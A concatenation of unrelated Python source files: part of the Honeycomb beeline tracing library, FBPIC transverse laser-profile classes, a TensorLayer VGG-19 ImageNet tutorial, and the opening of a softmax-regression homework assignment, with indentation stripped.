terminates abruptly.
'''
bl = get_beeline()
if bl:
bl.send_all()
def get_beeline():
return _GBL
def get_responses_queue():
'''
Returns a queue from which you can read a record of response info from
each event sent. Responses will be dicts with the following keys:
- `status_code` - the HTTP response from the api (eg. 200 or 503)
- `duration` - how long it took to POST this event to the api, in ms
- `metadata` - pass through the metadata you added on the initial event
- `body` - the content returned by API (will be empty on success)
- `error` - in an error condition, this is filled with the error message
When the Client's `close` method is called, a None will be inserted on
the queue, indicating that no further responses will be written.
'''
bl = get_beeline()
if bl:
return bl.get_responses_queue()
def close():
''' close the beeline and libhoney client, flushing any unsent events. '''
global _GBL
if _GBL:
_GBL.close()
_GBL = None
def traced(name, trace_id=None, parent_id=None):
'''
Function decorator to wrap an entire function in a trace span. If no trace
is active in the current thread, starts a new trace, and the wrapping span
will be a root span. If a trace is active, creates a child span of the
existing trace.
Example use:
```
@traced(name="my_expensive_function")
def my_func(n):
recursive_fib(n)
my_func(100)
```
Args:
- `name`: a descriptive name for the this trace span, i.e. "function_name". This is required.
- `trace_id`: the trace_id to use. If None, will be automatically generated.
Use this if you want to explicitly resume a trace in this application that was
initiated in another application, and you have the upstream trace_id.
- `parent_id`: If trace_id is set, will populate the root span's parent
with this id.
'''
return traced_impl(tracer_fn=tracer, name=name, trace_id=trace_id, parent_id=parent_id)
def traced_thread(fn):
'''
Function decorator to pass context to a function that is a thread target. Because the beeline uses
thread-local storage to keep track of trace state, tracing doesn't work across threads unless the state
is explicitly passed between threads. You can use this decorator to more easily pass state to a thread.
Example use:
```
@traced(name="my_async_function")
def my_func():
# ...
with beeline.tracer(name="do_stuff"):
do_stuff()
# we want to call my_func asynchronously by passing to a thread or a thread pool
@beeline.traced_thread
def _my_func_t():
return my_func()
t = threading.Thread(target=_my_func_t)
t.start()
```
'''
# if beeline is not initialized, or there is no active trace, do nothing
bl = get_beeline()
if bl is None or bl.tracer_impl.get_active_trace_id() is None:
@functools.wraps(fn)
def noop(*args, **kwargs):
return fn(*args, **kwargs)
return noop
trace_copy = bl.tracer_impl._trace.copy()
@functools.wraps(fn)
def wrapped(*args, **kwargs):
bl.tracer_impl._trace = trace_copy
return fn(*args, **kwargs)
return wrapped
|
# Copyright 2016, FBPIC contributors
# Authors: <NAME>, <NAME>
# License: 3-Clause-BSD-LBNL
"""
This file is part of the Fourier-Bessel Particle-In-Cell code (FB-PIC)
It defines a set of common transverse laser profiles.
"""
import numpy as np
from scipy.special import factorial, genlaguerre, binom
# Generic classes
# ---------------
class LaserTransverseProfile(object):
"""
Base class for all 2D transverse laser profiles.
Such a profile can be combined with a 1D longitudinal laser profile to
define a 3D laser profile that is valid under the paraxial approximation.
Any new transverse laser profile should inherit from this class,
and define its own `evaluate(x,y,z)` method, using the same signature
as the method below.
"""
def __init__(self, propagation_direction, gpu_capable=False):
"""
Initialize the propagation direction of the laser.
(Each subclass should call this method at initialization.)
Parameter
---------
propagation_direction: int
Indicates in which direction the laser propagates.
This should be either 1 (laser propagates towards positive z)
or -1 (laser propagates towards negative z).
gpu_capable: boolean
Indicates whether this laser profile works with cupy arrays on
GPU. This is usually the case if it only uses standard arithmetic
and numpy operations. Default: False.
"""
assert propagation_direction in [-1, 1]
self.propag_direction = float(propagation_direction)
self.gpu_capable = gpu_capable
def evaluate(self, x, y, z):
"""
Return the complex longitudinal laser profile.
This profile should be valid for any propagation distance z.
In particular, it should include diffraction effects (e.g. change in
effective waist, and effective amplitude, Gouy phase, etc. for a
Gaussian pulse). It should not include the longitudinal laser envelope,
since this is instead included in the longitudinal profile.
Parameters
-----------
x, y, z: ndarrays (meters)
The position at which to calculate the profile (in the lab frame)
Returns:
--------
profile: ndarray
Arrays of the same shape as x, containing the complex
transverse profile
"""
# The base class only defines dummy fields
# (This should be replaced by any class that inherits from this one.)
return np.zeros_like(x, dtype='complex')
def squared_profile_integral(self):
"""
Return the integral of the square of the absolute value of
of the (complex) laser profile in the transverse plane:
.. math::
\\int_0^{2\\pi} d\\theta \\int_0^\\infty r \,dr|f(r, \\theta)|^2
Returns:
--------
integral: float
"""
# The base class only defines a dummy implementation
# (This should be replaced by any class that inherits from this one.)
return 0
# Particular classes for each transverse laser profile
# ------------------------------------------------------
class GaussianTransverseProfile(LaserTransverseProfile):
"""Class that calculates a Gaussian transverse laser profile."""
def __init__(self, waist, zf=0., lambda0=0.8e-6, propagation_direction=1):
"""
Define the complex transverse profile of a Gaussian laser.
**In the focal plane** (:math:`z=z_f`), the profile translates to a
laser with a transverse electric field:
.. math::
E(x,y,z=z_f) \propto \exp\left( -\\frac{r^2}{w_0^2} \\right)
where :math:`w_0` is the laser waist and :math:`r = \sqrt{x^2 + y^2}`.
Note that the peak amplitude of the profile is unity at the focus.
Parameters
----------
waist: float (in meter)
Laser waist at the focal plane, defined as :math:`w_0` in the
above formula.
zf: float (in meter), optional
The position of the focal plane (in the lab frame).
If ``zf`` is not provided, the code assumes that ``zf=0.``.
lambda0: float (in meter), optional
The wavelength of the laser (in the lab frame), defined as
:math:`\\lambda_0` in the above formula.
Default: 0.8 microns (Ti:Sapph laser).
propagation_direction: int, optional
Indicates in which direction the laser propagates.
This should be either 1 (laser propagates towards positive z)
or -1 (laser propagates towards negative z).
"""
# Initialize propagation direction and mark the profile as GPU capable
LaserTransverseProfile.__init__(self, propagation_direction,
gpu_capable=True)
# Wavevector and Rayleigh length
k0 = 2 * np.pi / lambda0
zr = 0.5 * k0 * waist ** 2
# Store the parameters
self.k0 = k0
self.inv_zr = 1. / zr
self.zf = zf
self.w0 = waist
def evaluate(self, x, y, z):
"""
See the docstring of LaserTransverseProfile.evaluate
"""
# The formula for the transverse laser profile (in complex numbers) is
# obtained by multiplying the Fourier transform of the laser at focus
# E(k_x, k_y) = exp(-(k_x^2 + k_y^2)w_0^2/4)
# by the paraxial propagator e^(-i ((k_x^2 +k_y^2)/2k0)(z-z_foc) )
# and then by taking the inverse Fourier transform in x, y.
prop_dir = self.propag_direction
# Diffraction factor
diffract_factor = 1. + 1j * prop_dir * (z - self.zf) * self.inv_zr
# Calculate the argument of the complex exponential
exp_argument = - (x ** 2 + y ** 2) / (self.w0 ** 2 * diffract_factor)
# Get the transverse profile
profile = np.exp(exp_argument) / diffract_factor
return profile
def squared_profile_integral(self):
"""
See the docstring of LaserTransverseProfile.squared_profile_integral
"""
return 0.5 * np.pi * self.w0**2
class LaguerreGaussTransverseProfile( LaserTransverseProfile ):
"""Class that calculates a Laguerre-Gauss transverse laser profile."""
def __init__( self, p, m, waist, zf=0., lambda0=0.8e-6, theta0=0.,
propagation_direction=1 ):
"""
Define the complex transverse profile of a Laguerre-Gauss laser.
Unlike the :any:`DonutLikeLaguerreGaussLaser` profile, this
profile has a phase which is independent of the azimuthal angle
:math:`theta`, and an intensity profile which does depend on
:math:`theta`.
**In the focal plane** (:math:`z=z_f`), the profile translates to a
laser with a transverse electric field:
.. math::
E(x,y,z=zf) \propto \, f(r, \\theta) \,
\exp\left( -\\frac{r^2}{w_0^2} )
\mathrm{with} \qquad f(r, \\theta) =
\sqrt{\\frac{p!(2-\delta_{m,0})}{(m+p)!}}
\\left( \\frac{\sqrt{2}r}{w_0} \\right)^m
L^m_p\\left( \\frac{2 r^2}{w_0^2} \\right)
\cos[ m(\\theta - \\theta_0)]
where :math:`L^m_p` is a Laguerre polynomial and :math:`w_0` is the
laser waist.
Note that, for :math:`p=m=0`, the profile reduces to a Gaussian and the
peak field amplitude is unity. For :math:`m \\neq 0`, the peak
amplitude is reduced, such that the energy of the pulse is independent
of ``p`` and ``m``.
(For more info, see
`<NAME> (1986) <https://www.osapublishing.org/books/bookshelf/lasers.cfm>`_,
Chapter 16: Wave optics and Gaussian beams)
.. warning::
The above formula depends on a parameter :math:`m`
(see documentation below). In order to be properly resolved by
the simulation, a Laguerre-Gauss profile with a given :math:`m`
requires the azimuthal modes from :math:`0` to :math:`m+1`.
(i.e. the number of required azimuthal modes is ``Nm=m+2``)
The non-linear plasma response for this profile (e.g.
wakefield driven by the ponderomotive force) may require
even more azimuthal modes.
Parameters
----------
p: int (positive)
The order of the Laguerre polynomial. (Increasing ``p`` increases
the number of "rings" in the radial intensity profile of the laser.)
m: int (positive)
The azimuthal order of the pulse.
(In the transverse plane, the field of the pulse varies as
:math:`\cos[m(\\theta-\\theta_0)]`.)
waist: float (in meter)
Laser waist at the focal plane, defined as :math:`w_0` in the
above formula.
zf: float (in meter), optional
The position of the focal plane (in the lab frame).
If ``zf`` is not provided, the code assumes ``zf=0.``.
lambda0: float (in meter), optional
The wavelength of the laser (in the lab frame), defined as
:math:`\\lambda_0` in the above formula.
Default: 0.8 microns (Ti:Sapph laser).
theta0: float (in radian), optional
The azimuthal position of (one of) the maxima of intensity, in the
transverse plane.
(In the transverse plane, the field of the pulse varies as
:math:`\cos[m(\\theta-\\theta_0)]`.)
propagation_direction: int, optional
Indicates in which direction the laser propagates.
This should be either 1 (laser propagates towards positive z)
or -1 (laser propagates towards negative z).
"""
# Initialize propagation direction
LaserTransverseProfile.__init__(self, propagation_direction)
# Wavevector and Rayleigh length
k0 = 2*np.pi/lambda0
zr = 0.5*k0*waist**2
# Scaling factor, so that the pulse energy is independent of p and m.
if m ==0:
scaled_amplitude = 1.
else:
scaled_amplitude = np.sqrt( factorial(p)/factorial(m+p) )
if m != 0:
scaled_amplitude *= 2**.5
# Store the parameters
if m < 0 or type(m) is not int:
raise ValueError("m should be an integer positive number.")
self.p = p
self.m = m
self.scaled_amplitude = scaled_amplitude
self.laguerre_pm = genlaguerre(self.p, self.m) # Laguerre polynomial
self.theta0 = theta0
self.k0 = k0
self.inv_zr = 1./zr
self.zf = zf
self.w0 = waist
def evaluate( self, x, y, z ):
"""
See the docstring of LaserTransverseProfile.evaluate
"""
# Diffraction factor, waist and Gouy phase
prop_dir = self.propag_direction
diffract_factor = 1. + 1j * prop_dir * (z - self.zf) * self.inv_zr
w = self.w0 * abs( diffract_factor )
psi = np.angle( diffract_factor )
# Calculate the scaled radius and azimuthal angle
scaled_radius_squared = 2*( x**2 + y**2 ) / w**2
scaled_radius = np.sqrt( scaled_radius_squared )
theta = np.angle( x + 1.j*y )
# Calculate the argument of the complex exponential
exp_argument = - (x**2 + y**2) / (self.w0**2 * diffract_factor) \
- 1.j*(2*self.p + self.m)*psi # *Additional* Gouy phase
# Get the transverse profile
profile = np.exp(exp_argument) / diffract_factor \
* scaled_radius**self.m * self.laguerre_pm(scaled_radius_squared) \
* np.cos( self.m*(theta-self.theta0) )
# Scale the amplitude, so that the pulse energy is independent of m and p
profile *= self.scaled_amplitude
return profile
def squared_profile_integral(self):
"""
See the docstring of LaserTransverseProfile.squared_profile_integral
"""
return 0.5 * np.pi * self.w0**2
class DonutLikeLaguerreGaussTransverseProfile( LaserTransverseProfile ):
"""Define the complex transverse profile of a donut-like Laguerre-Gauss
laser."""
def __init__( self, p, m, waist, zf=0., lambda0=0.8e-6,
propagation_direction=1 ):
"""
Define the complex transverse profile of a donut-like Laguerre-Gauss
laser.
Unlike the :any:`LaguerreGaussLaser` profile, this
profile has a phase which depends on the azimuthal angle
:math:`\\theta` (cork-screw pattern), and an intensity profile which
is independent on :math:`\\theta` (donut-like).
**In the focal plane** (:math:`z=z_f`), the profile translates to a
laser with a transverse electric field:
.. math::
E(x,y,z=zf) \propto \, \, f(r) \,
\exp\left( -\\frac{r^2}{w_0^2} \\right) \,
\exp\left( -i m\\theta \\right)
\mathrm{with} \qquad f(r) =
\sqrt{\\frac{p!}{(|m|+p)!}}
\\left( \\frac{\sqrt{2}r}{w_0} \\right)^{|m|}
L^{|m|}_p\\left( \\frac{2 r^2}{w_0^2} \\right)
where :math:`L^m_p` is a Laguerre polynomial and :math:`w_0` is the
laser waist.
(For more info, see
`<NAME> (1986) <https://www.osapublishing.org/books/bookshelf/lasers.cfm>`_,
Chapter 16: Wave optics and Gaussian beams)
.. warning::
The above formula depends on a parameter :math:`m`
(see documentation below). In order to be properly resolved by
the simulation, a Laguerre-Gauss profile with a given :math:`m`
requires the azimuthal modes from :math:`0` to :math:`|m|+1`.
(i.e. the number of required azimuthal modes is ``Nm=|m|+2``)
Parameters
----------
p: int
The order of the Laguerre polynomial. (Increasing ``p`` increases
the number of "rings" in the radial intensity profile of the laser.)
m: int (positive or negative)
The azimuthal order of the pulse. The laser phase in a given
transverse plane varies as :math:`m \\theta`.
waist: float (in meter)
Laser waist at the focal plane, defined as :math:`w_0` in the
above formula.
zf: float (in meter), optional
The position of the focal plane (in the lab frame).
If ``zf`` is not provided, the code assumes that ``zf=0.``.
lambda0: float (in meter), optional
The wavelength of the laser (in the lab frame), defined as
:math:`\\lambda_0` in the above formula.
Default: 0.8 microns (Ti:Sapph laser).
propagation_direction: int, optional
Indicates in which direction the laser propagates.
This should be either 1 (laser propagates towards positive z)
or -1 (laser propagates towards negative z).
"""
# Initialize propagation direction
LaserTransverseProfile.__init__(self, propagation_direction)
# Wavevector and Rayleigh length
k0 = 2*np.pi/lambda0
zr = 0.5*k0*waist**2
# Scaling factor, so that the pulse energy is independent of p and m.
scaled_amplitude = np.sqrt( factorial(p)/factorial(abs(m)+p) )
# Store the parameters
self.p = p
self.m = m
self.scaled_amplitude = scaled_amplitude
self.laguerre_pm = genlaguerre(self.p, abs(m)) # Laguerre polynomial
self.k0 = k0
self.inv_zr = 1./zr
self.zf = zf
self.w0 = waist
def evaluate( self, x, y, z ):
"""
See the docstring of LaserTransverseProfile.evaluate
"""
# Diffraction factor, waist and Gouy phase
prop_dir = self.propag_direction
diffract_factor = 1. + 1j * prop_dir * ( z - self.zf ) * self.inv_zr
w = self.w0 * abs( diffract_factor )
psi = np.angle( diffract_factor )
# Calculate the scaled radius and azimuthal angle
scaled_radius_squared = 2*( x**2 + y**2 ) / w**2
scaled_radius = np.sqrt( scaled_radius_squared )
theta = np.angle( x + 1.j*y )
# Calculate the argument of the complex exponential
exp_argument = - 1.j*self.m*theta \
- (x**2 + y**2) / (self.w0**2 * diffract_factor) \
+ 1.j*(2*self.p + abs(self.m))*psi # *Additional* Gouy phase
# Get the transverse profile
profile = np.exp(exp_argument) / diffract_factor \
* scaled_radius**abs(self.m) \
* self.laguerre_pm(scaled_radius_squared)
# Scale the amplitude, so that the pulse energy is independent of m and p
profile *= self.scaled_amplitude
return profile
def squared_profile_integral(self):
"""
See the docstring of LaserTransverseProfile.squared_profile_integral
"""
return 0.5 * np.pi * self.w0**2
class FlattenedGaussianTransverseProfile( LaserTransverseProfile ):
"""Define the complex transverse profile of a focused flattened Gaussian
laser."""
def __init__( self, w0, N=6, zf=0., lambda0=0.8e-6,
propagation_direction=1 ):
"""
Define a complex transverse profile with a flattened Gaussian intensity
distribution **far from focus** that transform into a distribution
with rings **in the focal plane**. (See `S<NAME> al., J.
Modern Optics, 1997 <http://doi.org/10.1080/09500349708232927>`_)
Increasing the parameter ``N`` increases the
flatness of the transverse profile **far from focus**,
and increases the number of rings **in the focal plane**.
**In the focal plane** (:math:`z=z_f`), the profile translates to a
laser with a transverse electric field:
.. math::
E(x,y,z=zf) \propto
\exp\\left(-\\frac{r^2}{(N+1)w_0^2}\\right)
\sum_{n=0}^N c'_n L^0_n\\left(\\frac{2\,r^2}{(N+1)w_0^2}\\right)
\mathrm{with} Laguerre polynomials :math:`L^0_n` and
\qquad c'_n = \sum_{m=n}^{N}\\frac{1}{2^m}\\binom{m}{n}
- For :math:`N=0`, this is a Gaussian profile: :math:`E\propto\exp\\left(-\\frac{r^2}{w_0^2}\\right)`.
- For :math:`N\\rightarrow\infty`, this is a Jinc profile: :math:`E\propto \\frac{J_1(r/w_0)}{r/w_0}`.
The equivalent expression **far from focus** is
.. math::
E(x,y,z=\infty) \propto
\exp\\left(-\\frac{(N+1)r^2}{w(z)^2}\\right)
\sum_{n=0}^N \\frac{1}{n!}\left(\\frac{(N+1)\,r^2}{w(z)^2}\\right)^n
\mathrm{with} \qquad w(z) = \\frac{\lambda_0}{\pi w_0}|z-z_{foc}|
- For :math:`N=0`, this is a Gaussian profile: :math:`E\propto\exp\\left(-\\frac{r^2}{w_(z)^2}\\right)`.
- For :math:`N\\rightarrow\infty`, this is a flat profile: :math:`E\propto \\Theta(w(z)-r)`.
Parameters
----------
w0: float (in meter)
Laser spot size in the focal plane, defined as :math:`w_0` in the
above formula.
N: int
Determines the "flatness" of the transverse profile, far from
focus (see the above formula).
Default: ``N=6`` ; somewhat close to an 8th order supergaussian.
zf: float (in meter), optional
The position of the focal plane (in the lab frame).
If ``zf`` is not provided, the code assumes that ``zf=.``.
lambda0: float (in meter), optional
The wavelength of the laser (in the lab frame)
Default: 0.8 microns (Ti:Sapph laser).
propagation_direction: int, optional
Indicates in which direction the laser propagates.
This should be either 1 (laser propagates towards positive z)
or -1 (laser propagates towards negative z).
"""
# Initialize propagation direction
LaserTransverseProfile.__init__(self, propagation_direction)
# Ensure that N is an integer
self.N = int(round(N))
# Calculate effective waist of the Laguerre-Gauss modes, at focus
self.w_foc = w0*(self.N+1)**.5
# Wavevector and Rayleigh length
k0 = 2 * np.pi / lambda0
zr = 0.5 * k0 * self.w_foc**2
# Store laser parameters
self.k0 = k0
self.inv_zr = 1./zr
self.zf = zf
# Calculate the coefficients for the Laguerre-Gaussian modes
self.cn = np.empty(self.N+1)
for n in range(self.N+1):
m_values = np.arange(n, self.N+1)
self.cn[n] = np.sum((1./2)**m_values * binom(m_values,n)) / (self.N+1)
def evaluate( self, x, y, z ):
"""
See the docstring of LaserTransverseProfile.evaluate
"""
# Diffraction factor, waist and Gouy phase
prop_dir = self.propag_direction
diffract_factor = 1. + 1j * prop_dir * (z - self.zf) * self.inv_zr
w = self.w_foc * np.abs( diffract_factor )
psi = np.angle( diffract_factor )
# Argument for the Laguerre polynomials
scaled_radius_squared = 2*( x**2 + y**2 ) / w**2
# Sum recursively over the Laguerre polynomials
laguerre_sum = np.zeros_like( x, dtype=np.complex128 )
for n in range(0, self.N+1):
# Recursive calculation of the Laguerre polynomial
# - `L` represents $L_n$
# - `L1` represents $L_{n-1}$
# - `L2` represents $L_{n-2}$
if n==0:
L = 1.
elif n==1:
L1 = L
L = 1. - scaled_radius_squared
else:
L2 = L1
L1 = L
L = (((2*n -1) - scaled_radius_squared) * L1 - (n - 1) * L2) / n
# Add to the sum, including the term for the additional Gouy phase
laguerre_sum += self.cn[n] * np.exp( - (2j* n) * psi ) * L
# Final profile: multiply by n-independent propagation factors
exp_argument = - (x**2 + y**2) / (self.w_foc**2 * diffract_factor)
profile = laguerre_sum * np.exp( exp_argument ) / diffract_factor
return profile
def squared_profile_integral(self):
"""
See the docstring of LaserTransverseProfile.squared_profile_integral
"""
return 0.5 * np.pi * self.w_foc**2 * sum( self.cn**2 )
|
<filename>examples/pretrained_cnn/tutorial_vgg19.py
#! /usr/bin/python
# -*- coding: utf-8 -*-
"""
VGG-19 for ImageNet.
Pre-trained model in this example - VGG19 NPZ and
trainable examples of VGG16/19 in TensorFlow can be found here:
https://github.com/machrisaa/tensorflow-vgg
For simplified CNN layer see "Convolutional layer (Simplified)"
in read the docs website.
"""
import os
import time
import numpy as np
import skimage
import skimage.io
import skimage.transform
import tensorflow as tf
import tensorlayer as tl
from tensorlayer.layers import *
tf.logging.set_verbosity(tf.logging.DEBUG)
tl.logging.set_verbosity(tl.logging.DEBUG)
try:
from tensorlayer.models.imagenet_classes import *
except Exception as e:
raise Exception(
"{} / download the file from: https://github.com/tensorlayer/tensorlayer/tree/master/example/data".format(e)
)
VGG_MEAN = [103.939, 116.779, 123.68]
MODEL_DIR = "models"
MODEL_NAME = "vgg19.npy"
MODEL_PATH = os.path.join(MODEL_DIR, MODEL_NAME)
def load_image(path):
# load image
img = skimage.io.imread(path)
img = img / 255.0
if ((0 <= img).all() and (img <= 1.0).all()) is False:
raise Exception("image value should be [0, 1]")
# print "Original Image Shape: ", img.shape
# we crop image from center
short_edge = min(img.shape[:2])
yy = int((img.shape[0] - short_edge) / 2)
xx = int((img.shape[1] - short_edge) / 2)
crop_img = img[yy:yy + short_edge, xx:xx + short_edge]
# resize to 224, 224
resized_img = skimage.transform.resize(crop_img, (224, 224), anti_aliasing=False)
return resized_img
def print_prob(prob):
synset = class_names
# print prob
pred = np.argsort(prob)[::-1]
# Get top1 label
top1 = synset[pred[0]]
print("Top1: ", top1, prob[pred[0]])
# Get top5 label
top5 = [(synset[pred[i]], prob[pred[i]]) for i in range(5)]
print("Top5: ", top5)
return top1
def Vgg19(rgb):
"""
Build the VGG 19 Model
Parameters
-----------
rgb : rgb image placeholder [batch, height, width, 3] values scaled [0, 1]
"""
start_time = time.time()
print("build model started")
rgb_scaled = rgb * 255.0
# Convert RGB to BGR
red, green, blue = tf.split(rgb_scaled, 3, 3)
if red.get_shape().as_list()[1:] != [224, 224, 1]:
raise Exception("image size unmatch")
if green.get_shape().as_list()[1:] != [224, 224, 1]:
raise Exception("image size unmatch")
if blue.get_shape().as_list()[1:] != [224, 224, 1]:
raise Exception("image size unmatch")
bgr = tf.concat([
blue - VGG_MEAN[0],
green - VGG_MEAN[1],
red - VGG_MEAN[2],
], axis=3)
if bgr.get_shape().as_list()[1:] != [224, 224, 3]:
raise Exception("image size unmatch")
# input layer
net_in = InputLayer(bgr, name='input')
# conv1
net = Conv2dLayer(net_in, act=tf.nn.relu, shape=[3, 3, 3, 64], strides=[1, 1, 1, 1], padding='SAME', name='conv1_1')
net = Conv2dLayer(net, act=tf.nn.relu, shape=[3, 3, 64, 64], strides=[1, 1, 1, 1], padding='SAME', name='conv1_2')
net = PoolLayer(net, ksize=[1, 2, 2, 1], strides=[1, 2, 2, 1], padding='SAME', pool=tf.nn.max_pool, name='pool1')
# conv2
net = Conv2dLayer(net, act=tf.nn.relu, shape=[3, 3, 64, 128], strides=[1, 1, 1, 1], padding='SAME', name='conv2_1')
net = Conv2dLayer(net, act=tf.nn.relu, shape=[3, 3, 128, 128], strides=[1, 1, 1, 1], padding='SAME', name='conv2_2')
net = PoolLayer(net, ksize=[1, 2, 2, 1], strides=[1, 2, 2, 1], padding='SAME', pool=tf.nn.max_pool, name='pool2')
# conv3
net = Conv2dLayer(net, act=tf.nn.relu, shape=[3, 3, 128, 256], strides=[1, 1, 1, 1], padding='SAME', name='conv3_1')
net = Conv2dLayer(net, act=tf.nn.relu, shape=[3, 3, 256, 256], strides=[1, 1, 1, 1], padding='SAME', name='conv3_2')
net = Conv2dLayer(net, act=tf.nn.relu, shape=[3, 3, 256, 256], strides=[1, 1, 1, 1], padding='SAME', name='conv3_3')
net = Conv2dLayer(net, act=tf.nn.relu, shape=[3, 3, 256, 256], strides=[1, 1, 1, 1], padding='SAME', name='conv3_4')
net = PoolLayer(net, ksize=[1, 2, 2, 1], strides=[1, 2, 2, 1], padding='SAME', pool=tf.nn.max_pool, name='pool3')
# conv4
net = Conv2dLayer(net, act=tf.nn.relu, shape=[3, 3, 256, 512], strides=[1, 1, 1, 1], padding='SAME', name='conv4_1')
net = Conv2dLayer(net, act=tf.nn.relu, shape=[3, 3, 512, 512], strides=[1, 1, 1, 1], padding='SAME', name='conv4_2')
net = Conv2dLayer(net, act=tf.nn.relu, shape=[3, 3, 512, 512], strides=[1, 1, 1, 1], padding='SAME', name='conv4_3')
net = Conv2dLayer(net, act=tf.nn.relu, shape=[3, 3, 512, 512], strides=[1, 1, 1, 1], padding='SAME', name='conv4_4')
net = PoolLayer(net, ksize=[1, 2, 2, 1], strides=[1, 2, 2, 1], padding='SAME', pool=tf.nn.max_pool, name='pool4')
# conv5
net = Conv2dLayer(net, act=tf.nn.relu, shape=[3, 3, 512, 512], strides=[1, 1, 1, 1], padding='SAME', name='conv5_1')
net = Conv2dLayer(net, act=tf.nn.relu, shape=[3, 3, 512, 512], strides=[1, 1, 1, 1], padding='SAME', name='conv5_2')
net = Conv2dLayer(net, act=tf.nn.relu, shape=[3, 3, 512, 512], strides=[1, 1, 1, 1], padding='SAME', name='conv5_3')
net = Conv2dLayer(net, act=tf.nn.relu, shape=[3, 3, 512, 512], strides=[1, 1, 1, 1], padding='SAME', name='conv5_4')
net = PoolLayer(net, ksize=[1, 2, 2, 1], strides=[1, 2, 2, 1], padding='SAME', pool=tf.nn.max_pool, name='pool5')
# fc 6~8
net = FlattenLayer(net, name='flatten')
net = DenseLayer(net, n_units=4096, act=tf.nn.relu, name='fc6')
net = DenseLayer(net, n_units=4096, act=tf.nn.relu, name='fc7')
net = DenseLayer(net, n_units=1000, act=None, name='fc8')
print("build model finished: %fs" % (time.time() - start_time))
return net
def Vgg19_simple_api(rgb):
"""
Build the VGG 19 Model
Parameters
-----------
rgb : rgb image placeholder [batch, height, width, 3] values scaled [0, 1]
"""
start_time = time.time()
print("build model started")
rgb_scaled = rgb * 255.0
# Convert RGB to BGR
red, green, blue = tf.split(rgb_scaled, 3, 3)
if red.get_shape().as_list()[1:] != [224, 224, 1]:
raise Exception("image size unmatch")
if green.get_shape().as_list()[1:] != [224, 224, 1]:
raise Exception("image size unmatch")
if blue.get_shape().as_list()[1:] != [224, 224, 1]:
raise Exception("image size unmatch")
bgr = tf.concat([
blue - VGG_MEAN[0],
green - VGG_MEAN[1],
red - VGG_MEAN[2],
], axis=3)
if bgr.get_shape().as_list()[1:] != [224, 224, 3]:
raise Exception("image size unmatch")
# input layer
net_in = InputLayer(bgr, name='input')
# conv1
net = Conv2d(net_in, 64, filter_size=(3, 3), strides=(1, 1), act=tf.nn.relu, padding='SAME', name='conv1_1')
net = Conv2d(net, n_filter=64, filter_size=(3, 3), strides=(1, 1), act=tf.nn.relu, padding='SAME', name='conv1_2')
net = MaxPool2d(net, filter_size=(2, 2), strides=(2, 2), padding='SAME', name='pool1')
# conv2
net = Conv2d(net, n_filter=128, filter_size=(3, 3), strides=(1, 1), act=tf.nn.relu, padding='SAME', name='conv2_1')
net = Conv2d(net, n_filter=128, filter_size=(3, 3), strides=(1, 1), act=tf.nn.relu, padding='SAME', name='conv2_2')
net = MaxPool2d(net, filter_size=(2, 2), strides=(2, 2), padding='SAME', name='pool2')
# conv3
net = Conv2d(net, n_filter=256, filter_size=(3, 3), strides=(1, 1), act=tf.nn.relu, padding='SAME', name='conv3_1')
net = Conv2d(net, n_filter=256, filter_size=(3, 3), strides=(1, 1), act=tf.nn.relu, padding='SAME', name='conv3_2')
net = Conv2d(net, n_filter=256, filter_size=(3, 3), strides=(1, 1), act=tf.nn.relu, padding='SAME', name='conv3_3')
net = Conv2d(net, n_filter=256, filter_size=(3, 3), strides=(1, 1), act=tf.nn.relu, padding='SAME', name='conv3_4')
net = MaxPool2d(net, filter_size=(2, 2), strides=(2, 2), padding='SAME', name='pool3')
# conv4
net = Conv2d(net, n_filter=512, filter_size=(3, 3), strides=(1, 1), act=tf.nn.relu, padding='SAME', name='conv4_1')
net = Conv2d(net, n_filter=512, filter_size=(3, 3), strides=(1, 1), act=tf.nn.relu, padding='SAME', name='conv4_2')
net = Conv2d(net, n_filter=512, filter_size=(3, 3), strides=(1, 1), act=tf.nn.relu, padding='SAME', name='conv4_3')
net = Conv2d(net, n_filter=512, filter_size=(3, 3), strides=(1, 1), act=tf.nn.relu, padding='SAME', name='conv4_4')
net = MaxPool2d(net, filter_size=(2, 2), strides=(2, 2), padding='SAME', name='pool4')
# conv5
net = Conv2d(net, n_filter=512, filter_size=(3, 3), strides=(1, 1), act=tf.nn.relu, padding='SAME', name='conv5_1')
net = Conv2d(net, n_filter=512, filter_size=(3, 3), strides=(1, 1), act=tf.nn.relu, padding='SAME', name='conv5_2')
net = Conv2d(net, n_filter=512, filter_size=(3, 3), strides=(1, 1), act=tf.nn.relu, padding='SAME', name='conv5_3')
net = Conv2d(net, n_filter=512, filter_size=(3, 3), strides=(1, 1), act=tf.nn.relu, padding='SAME', name='conv5_4')
net = MaxPool2d(net, filter_size=(2, 2), strides=(2, 2), padding='SAME', name='pool5')
# fc 6~8
net = FlattenLayer(net, name='flatten')
net = DenseLayer(net, n_units=4096, act=tf.nn.relu, name='fc6')
net = DenseLayer(net, n_units=4096, act=tf.nn.relu, name='fc7')
net = DenseLayer(net, n_units=1000, act=None, name='fc8')
print("build model finished: %fs" % (time.time() - start_time))
return net
sess = tf.InteractiveSession()
x = tf.placeholder("float", [None, 224, 224, 3])
# net = Vgg19(x)
net = Vgg19_simple_api(x)
y = net.outputs
probs = tf.nn.softmax(y, name="prob")
tl.layers.initialize_global_variables(sess)
# You need to download the pre-trained model - VGG19 NPY
if not os.path.isfile(MODEL_PATH):
print("Please download vgg19.npy from : https://github.com/machrisaa/tensorflow-vgg")
exit()
npy_file = np.load(MODEL_PATH, encoding='latin1').item()
params = []
for val in sorted(npy_file.items()):
W = np.asarray(val[1][0])
b = np.asarray(val[1][1])
print(" Loading %s: %s, %s" % (val[0], W.shape, b.shape))
params.extend([W, b])
print("Restoring model from npy file")
tl.files.assign_params(sess, params, net)
img1 = load_image("data/tiger.jpeg") # test data in github
img1 = img1.reshape((1, 224, 224, 3))
start_time = time.time()
prob = sess.run(probs, feed_dict={x: img1})
print("End time : %.5ss" % (time.time() - start_time))
print_prob(prob[0])
|
import numpy as np
import math
#-------------------------------------------------------------------------
'''
Problem 1: softmax regression
In this problem, you will implement the softmax regression for multi-class classification problems.
The main goal of this problem is to extend the logistic regression method to solving multi-class classification problems.
We will get familiar with computing gradients of vectors/matrices.
We will use multi-class cross entropy as the loss function and stochastic gradient descent to train the model parameters.
You could test the correctness of your code by typing `nosetests test1.py` in the terminal.
Notations:
---------- input data ----------------------
p: the number of input features, an integer scalar.
c: the number of classes in the classification task, an integer scalar.
x: the feature vector of a data instance, a float numpy matrix of shape p by 1.
y: the label of a training instance, an integer scalar value. The values can be 0,1,2, ..., or (c-1).
---------- model parameters ----------------------
